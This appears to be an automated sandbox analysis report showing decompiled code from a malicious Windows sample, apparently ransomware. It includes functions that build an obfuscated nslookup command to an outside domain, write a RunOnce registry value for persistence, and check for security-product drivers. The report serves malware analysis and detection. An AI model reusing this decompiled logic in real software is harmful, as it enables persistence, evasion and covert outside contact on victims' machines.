					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}







                                        0x0fc66f44
                                        0x0fc66f47
                                        0x0fc66f58
                                        0x0fc66f61
                                        0x0fc66f69
                                        0x0fc66f72
                                        0x0fc66f7a
                                        0x0fc66f7a
                                        0x0fc66f7f
                                        0x0fc66f85
                                        0x0fc66f8d
                                        0x0fc66f93
                                        0x0fc66f9b
                                        0x0fc66f9b
                                        0x0fc66fa1
                                        0x0fc66fa7
                                        0x0fc66faf
                                        0x0fc66fb5
                                        0x0fc66fbd
                                        0x0fc66fbd
                                        0x0fc66fc3
                                        0x0fc66fc9
                                        0x0fc66fd1
                                        0x0fc66fd7
                                        0x0fc66fdf
                                        0x0fc66fdf
                                        0x0fc66fe5
                                        0x0fc66feb
                                        0x0fc66ff3
                                        0x0fc66ff9
                                        0x0fc67001
                                        0x0fc67001
                                        0x0fc67007
                                        0x0fc6700d
                                        0x0fc67015
                                        0x0fc6701b
                                        0x0fc67023
                                        0x0fc67023
                                        0x0fc67029
                                        0x0fc6702f
                                        0x0fc67037
                                        0x0fc6703d
                                        0x0fc67045
                                        0x0fc67045
                                        0x0fc6704b
                                        0x0fc67051
                                        0x0fc67059
                                        0x0fc6705f
                                        0x0fc67067
                                        0x0fc67067
                                        0x0fc6706d
                                        0x0fc67073
                                        0x0fc6707b
                                        0x0fc67081
                                        0x0fc67089
                                        0x0fc67089
                                        0x0fc6708f
                                        0x0fc6709c
                                        0x0fc670a2
                                        0x0fc670a5
                                        0x0fc670aa
                                        0x0fc670c7
                                        0x0fc670ac
                                        0x0fc670b6
                                        0x0fc670bc
                                        0x0fc670d4
                                        0x0fc670dc
                                        0x0fc670e2
                                        0x0fc670ea
                                        0x0fc670f6
                                        0x0fc670f6
                                        0x0fc67100
                                        0x0fc67106
                                        0x0fc6710e
                                        0x0fc67114
                                        0x0fc6711c
                                        0x0fc6711c
                                        0x0fc67128
                                        0x0fc67132

                                        APIs
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F61
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66F69
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F72
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66F7A
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F85
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66F8D
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66F93
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66F9B
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FA7
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66FAF
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FB5
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66FBD
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FC9
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66FD1
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FD7
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC66FDF
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FEB
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC66FF3
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC66FF9
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67001
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6700D
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC67015
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6701B
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67023
                                        • lstrcatW.KERNEL32(?,0FC64966), ref: 0FC6702F
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC67037
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6703D
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67045
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67051
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC67059
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC6705F
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67067
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67073
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC6707B
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67081
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC67089
                                        • VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FC64699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FC6709C
                                        • wsprintfW.USER32 ref: 0FC670B6
                                        • wsprintfW.USER32 ref: 0FC670C7
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC670D4
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC670DC
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC670E2
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC670EA
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FC670F6
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67106
                                        • lstrcatW.KERNEL32(?,0FC6FF50), ref: 0FC6710E
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67114
                                        • lstrcatW.KERNEL32(?,0FC6FF54), ref: 0FC6711C
                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,0FC64699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6711F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                        • String ID: %x%x$undefined
                                        • API String ID: 3872469520-3801831566
                                        • Opcode ID: ab0ae01d310b2c721d131ad957a09d73ef5d554e6457ea0662822167b3d3088c
                                        • Instruction ID: 76105b09341402a916408545840f5197b8a0d2034509184b0afb6823d97e03f5
                                        • Opcode Fuzzy Hash: ab0ae01d310b2c721d131ad957a09d73ef5d554e6457ea0662822167b3d3088c
                                        • Instruction Fuzzy Hash: 2551803010A658B6DB237F619C8BFDF3B58FFC6304F010064FA14280569BA99256DFBA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64E90 Relevance: 64.9, APIs: 8, Strings: 29, Instructions: 120pipememoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0FC64E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				struct _SECURITY_ATTRIBUTES _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				void* _t49;
				void* _t57;
				CHAR* _t64;
				void* _t66;

				_v64 = 0x73006e;
				_t57 = __edx;
				_v8 = 0;
				_t64 = __ecx;
				_v68 = 0;
				_v60 = 0x6f006c;
				_t43 =  !=  ?  &_v124 :  &_v64;
				_v56 = 0x6b006f;
				_a4 =  !=  ?  &_v124 :  &_v64;
				_v52 = 0x700075;
				_v48 = 0x250020;
				_v44 = 0x200053;
				_v40 = 0x6e0064;
				_v36 = 0x310073;
				_v32 = 0x73002e;
				_v28 = 0x70006f;
				_v24 = 0x6f0072;
				_v20 = 0x6e0064;
				_v16 = 0x2e0073;
				_v12 = 0x750072;
				_v124 = 0x73006e;
				_v120 = 0x6f006c;
				_v116 = 0x6b006f;
				_v112 = 0x700075;
				_v108 = 0x250020;
				_v104 = 0x200053;
				_v100 = 0x6e0064;
				_v96 = 0x320073;
				_v92 = 0x73002e;
				_v88 = 0x70006f;
				_v84 = 0x6f0072;
				_v80 = 0x6e0064;
				_v76 = 0x2e0073;
				_v72 = 0x750072;
				_v136.nLength = 0xc;
				_v136.bInheritHandle = 1;
				_v136.lpSecurityDescriptor = 0;
				_t45 = CreatePipe(0xfc72a70, 0xfc72a6c,  &_v136, 0); // executed
				if(_t45 != 0) {
					_t45 = SetHandleInformation( *0xfc72a70, 1, 0);
					if(_t45 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfc72a68, 0xfc72a74,  &_v136, 0); // executed
						_t45 = SetHandleInformation( *0xfc72a74, 1, 0);
						if(_t45 == 0) {
							goto L1;
						} else {
							_t49 = VirtualAlloc(0, 0x2800, 0x3000, 4); // executed
							_t66 = _t49;
							if(_t66 == 0) {
								lstrcpyA(_t64, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t66, _a4, _t57);
								E0FC64C40(_t66); // executed
								E0FC64DE0(_t57, _t64, _t57, _t64, _t66); // executed
								VirtualFree(_t66, 0, 0x8000); // executed
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t45 | 0xffffffff;
				}
			}










































                                        0x0fc64e9d
                                        0x0fc64ea8
                                        0x0fc64eab
                                        0x0fc64eaf
                                        0x0fc64eb1
                                        0x0fc64ebb
                                        0x0fc64ec2
                                        0x0fc64ec5
                                        0x0fc64ece
                                        0x0fc64ee2
                                        0x0fc64ee9
                                        0x0fc64ef0
                                        0x0fc64ef7
                                        0x0fc64efe
                                        0x0fc64f05
                                        0x0fc64f0c
                                        0x0fc64f13
                                        0x0fc64f1a
                                        0x0fc64f21
                                        0x0fc64f28
                                        0x0fc64f2f
                                        0x0fc64f36
                                        0x0fc64f3d
                                        0x0fc64f44
                                        0x0fc64f4b
                                        0x0fc64f52
                                        0x0fc64f59
                                        0x0fc64f60
                                        0x0fc64f67
                                        0x0fc64f6e
                                        0x0fc64f75
                                        0x0fc64f7c
                                        0x0fc64f83
                                        0x0fc64f8a
                                        0x0fc64f91
                                        0x0fc64f9b
                                        0x0fc64fa2
                                        0x0fc64fa9
                                        0x0fc64fb1
                                        0x0fc64fcd
                                        0x0fc64fd1
                                        0x00000000
                                        0x0fc64fd3
                                        0x0fc64fe6
                                        0x0fc64ff6
                                        0x0fc64ffa
                                        0x00000000
                                        0x0fc64ffc
                                        0x0fc6500a
                                        0x0fc65010
                                        0x0fc65014
                                        0x0fc65051
                                        0x0fc6505f
                                        0x0fc65016
                                        0x0fc6501b
                                        0x0fc65026
                                        0x0fc6502f
                                        0x0fc6503c
                                        0x0fc6504a
                                        0x0fc6504a
                                        0x0fc65014
                                        0x0fc64ffa
                                        0x0fc64fb3
                                        0x0fc64fb3
                                        0x0fc64fbc
                                        0x0fc64fbc

                                        APIs
                                        • CreatePipe.KERNEL32(0FC72A70,0FC72A6C,?,00000000,00000001,00000001,00000000), ref: 0FC64FA9
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FC64FCD
                                        • CreatePipe.KERNEL32(0FC72A68,0FC72A74,0000000C,00000000), ref: 0FC64FE6
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FC64FF6
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FC6500A
                                        • wsprintfW.USER32 ref: 0FC6501B
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6503C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                        • String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
                                        • API String ID: 1490407255-3453122116
                                        • Opcode ID: a97f865925521ebf83fab770653c6b975d0085a073a15dbae6d2e2e97b76d9ab
                                        • Instruction ID: 16e9c2b3d5200cdd31efff8416815c205337974bf0061f3264cc8b02a7bb3c2c
                                        • Opcode Fuzzy Hash: a97f865925521ebf83fab770653c6b975d0085a073a15dbae6d2e2e97b76d9ab
                                        • Instruction Fuzzy Hash: 0F416070A44319EBEB10CF91EC4A7EDBFB5FB04755F104129E604AA281CBFA4558CF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 94%
                                        			E0FC62960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FC68150( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}





































                                        0x0fc6296b
                                        0x0fc6296d
                                        0x0fc62979
                                        0x0fc62980
                                        0x0fc62984
                                        0x0fc6298c
                                        0x0fc62993
                                        0x0fc6299a
                                        0x0fc629a8
                                        0x0fc629b0
                                        0x0fc629bd
                                        0x0fc629c7
                                        0x0fc629ce
                                        0x0fc629eb
                                        0x0fc629f8
                                        0x0fc629ff
                                        0x0fc62a06
                                        0x0fc62a0d
                                        0x0fc62a14
                                        0x0fc62a1b
                                        0x0fc62a22
                                        0x0fc62a29
                                        0x0fc62a30
                                        0x0fc62a37
                                        0x0fc62a3e
                                        0x0fc62a45
                                        0x0fc62a4c
                                        0x0fc62a53
                                        0x0fc62a5a
                                        0x0fc62a61
                                        0x0fc62a68
                                        0x0fc62a6f
                                        0x0fc62a76
                                        0x0fc62a7d
                                        0x0fc62a84
                                        0x0fc62a8c
                                        0x0fc62ac7
                                        0x0fc62a8e
                                        0x0fc62aa4
                                        0x0fc62aaf
                                        0x0fc62ab1
                                        0x0fc62ab7
                                        0x0fc62abf
                                        0x0fc62abf

                                        APIs
                                        • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0FC6299D
                                          • Part of subcall function 0FC68150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC6816D
                                          • Part of subcall function 0FC68150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FC6819B
                                          • Part of subcall function 0FC68150: GetModuleHandleA.KERNEL32(?), ref: 0FC681EF
                                          • Part of subcall function 0FC68150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC681FD
                                          • Part of subcall function 0FC68150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6820C
                                          • Part of subcall function 0FC68150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68255
                                          • Part of subcall function 0FC68150: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC68263
                                        • RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FC62C45,00000000), ref: 0FC62A84
                                        • lstrlenW.KERNEL32(00000000), ref: 0FC62A8F
                                        • RegSetValueExW.KERNEL32(0FC62C45,00520050,00000000,00000001,00000000,00000000), ref: 0FC62AA4
                                        • RegCloseKey.KERNEL32(0FC62C45), ref: 0FC62AB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                        • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                        • API String ID: 553367697-3791882466
                                        • Opcode ID: ddaa761fa3fb9a38e59fef6d8585c9bc5fcc0dc7bff3ee41ac7bbe6f108062c5
                                        • Instruction ID: 1be193926ebe30bac87ef55a1e6d5b67e48c5d8b9762971cbb698ddad71c5fe7
                                        • Opcode Fuzzy Hash: ddaa761fa3fb9a38e59fef6d8585c9bc5fcc0dc7bff3ee41ac7bbe6f108062c5
                                        • Instruction Fuzzy Hash: C231F9B090421DDFEB20CF91E949BEDBFB9FB01709F108119D6187A281D7BA49488F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137windowthreadregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 85%
                                        			E0FC62D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0FC62F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FC62C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FC62D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0FC62F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0FC62F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0FC630A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0FC62AD0(); // executed
				goto L5;
			}


















                                        0x0fc62d39
                                        0x0fc62d3a
                                        0x0fc62d3d
                                        0x0fc62d45
                                        0x0fc62d4a
                                        0x0fc62d52
                                        0x0fc62d5a
                                        0x0fc62d62
                                        0x0fc62d67
                                        0x0fc62d6f
                                        0x0fc62d77
                                        0x0fc62d7f
                                        0x0fc62d87
                                        0x0fc62d8e
                                        0x0fc62de9
                                        0x0fc62df1
                                        0x0fc62df9
                                        0x0fc62e01
                                        0x0fc62e09
                                        0x0fc62e11
                                        0x0fc62e22
                                        0x0fc62e26
                                        0x0fc62e3d
                                        0x0fc62e41
                                        0x0fc62e49
                                        0x0fc62e51
                                        0x0fc62e5f
                                        0x0fc62e68
                                        0x0fc62e6e
                                        0x0fc62e73
                                        0x0fc62e7b
                                        0x0fc62eaf
                                        0x0fc62eb4
                                        0x0fc62ebc
                                        0x0fc62ec8
                                        0x0fc62ecf
                                        0x0fc62ee3
                                        0x0fc62eeb
                                        0x0fc62eee
                                        0x0fc62eee
                                        0x0fc62f09
                                        0x0fc62f3d
                                        0x0fc62f3f
                                        0x0fc62f0b
                                        0x0fc62f17
                                        0x0fc62f1c
                                        0x0fc62f25
                                        0x00000000
                                        0x0fc62f17
                                        0x0fc62f09
                                        0x0fc62ebf
                                        0x0fc62ebf
                                        0x0fc62e75
                                        0x0fc62e75
                                        0x0fc62d94
                                        0x0fc62d9b
                                        0x00000000
                                        0x00000000
                                        0x0fc62da1
                                        0x0fc62da9
                                        0x0fc62db1
                                        0x0fc62db9
                                        0x0fc62dc1
                                        0x0fc62dc9
                                        0x0fc62dd0
                                        0x00000000
                                        0x00000000
                                        0x0fc62dd6
                                        0x0fc62ddd
                                        0x00000000
                                        0x00000000
                                        0x0fc62de3
                                        0x0fc62de4
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0FC62F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FC62F74
                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FC62E19
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0FC62E2E
                                        • LoadIconW.USER32 ref: 0FC62E59
                                        • RegisterClassExW.USER32 ref: 0FC62E68
                                        • ExitThread.KERNEL32 ref: 0FC62E75
                                          • Part of subcall function 0FC62F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FC62F8D
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FC62E7B
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FC62E81
                                        • CreateWindowExW.USER32 ref: 0FC62EA7
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0FC62EB4
                                        • ExitThread.KERNEL32 ref: 0FC62EBF
                                          • Part of subcall function 0FC62F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0FC62FA8
                                          • Part of subcall function 0FC62F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0FC62FCF
                                          • Part of subcall function 0FC62F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FC62FE3
                                          • Part of subcall function 0FC62F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC62FFA
                                        • ExitThread.KERNEL32 ref: 0FC62F3F
                                          • Part of subcall function 0FC62AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FC62AEA
                                          • Part of subcall function 0FC62AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FC62B2C
                                          • Part of subcall function 0FC62AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FC62B38
                                          • Part of subcall function 0FC62AD0: ExitThread.KERNEL32 ref: 0FC62C47
